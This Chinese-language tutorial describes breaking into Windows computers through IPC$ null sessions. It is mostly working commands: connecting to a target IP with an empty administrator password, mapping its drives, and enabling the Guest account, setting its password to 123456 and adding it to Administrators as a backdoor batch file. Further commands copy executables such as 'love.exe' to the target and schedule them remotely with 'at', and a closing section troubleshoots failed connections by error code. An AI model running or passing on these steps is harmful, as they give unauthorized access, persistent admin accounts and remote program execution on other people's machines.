前提条件
启动服务
首先保证目标的IPC服务启动,服务为lanmanWorkstation,显示名为Workstations
端口
telnet目标计算机lanmanWorkstation服务的两个端口,即139和445
telnet ip 139
telnet ip 445
启动目标IPC共享
这些要在目标计算机下执行
net share ipc$
关闭
net share ipc$ /del
步骤
建立ipc$连接
net use \IPipc$ "密码" /user:"用户名" (同样有3个空格)
net use \222.222.221.102ipc$ "" /user:"administrator"
删除一个ipc$连接
net use \IPipc$ /del
映射远程共享:
net use z: \IPDisk$
net use z: \222.222.221.102d$
删除共享映射
net use z: /del 删除映射的c盘,其他盘类推
net use * /del 删除全部,会有提示要求按y确认
查看远程主机的共享资源(但看不到默认共享)
net view \IP
添加以后登录账号(以下命令要在目标主机执行,目标主机重启后可用)
查看用户名
net user
查看帐户的属性
net user 帐户名
激活Guest用户
net user guest /active:yes
修改Guest密码
net user guest 123456
Guest变为Administrator
net localgroup administrators guest /add
可以将
net user guest /active:yes
net user guest 123456
net localgroup administrators guest /add
写成bat拷贝到目标计算机去执行。
远程执行bat
1.向远程主机复制文件
copy 路径srv.exe \IP共享目录名,如:
copy ccbirds.exe \*.*.*.*c 即将当前目录下的文件复制到对方c盘内
2.远程添加执行计划任务
at \ip 时间 程序名,如:
at \127.0.0.0 11:00 love.exe
注意:时间尽量使用24小时制;在系统默认搜索路径(比如system32/)下不用加路径,否则必须加全路径
可以用同开启权限的方式去开启telnet服务,然后telnet目标主机
目标主机开启了telnet的话可以
telnet 目标IP
输入刚才留的账户和密码
失败原因
1)你的系统不是NT或以上操作系统;
2)对方没有打开ipc$默认共享
3)对方未开启139或445端口(惑被防火墙屏蔽)
4)你的命令输入有误(比如缺少了空格等)
5)用户名或密码错误(空连接当然无所谓了)
根据返回的错误号分析原因:
错误号5,拒绝访问 : 很可能你使用的用户不是管理员权限的,先提升权限;
错误号51,Windows 无法找到网络路径 : 网络有问题;
错误号53,找不到网络路径 : ip地址错误;目标未开机;目标lanmanserver服务未启动;目标有防火墙(端口过滤);
错误号67,找不到网络名 : 你的lanmanworkstation服务未启动;目标删除了ipc$;
错误号1219,提供的凭据与已存在的凭据集冲突 : 你已经和对方建立了一个ipc$,请删除再连。
错误号1326,未知的用户名或错误密码 : 原因很明显了;
错误号1327,用户账户限制阻止了此用户进行登录;
错误号1792,试图登录,但是网络登录服务没有启动 : 目标NetLogon服务未启动。(连接域控会出现此情况)
错误号2242,此用户的密码已经过期 : 目标有帐号策略,强制定期要求更改密码。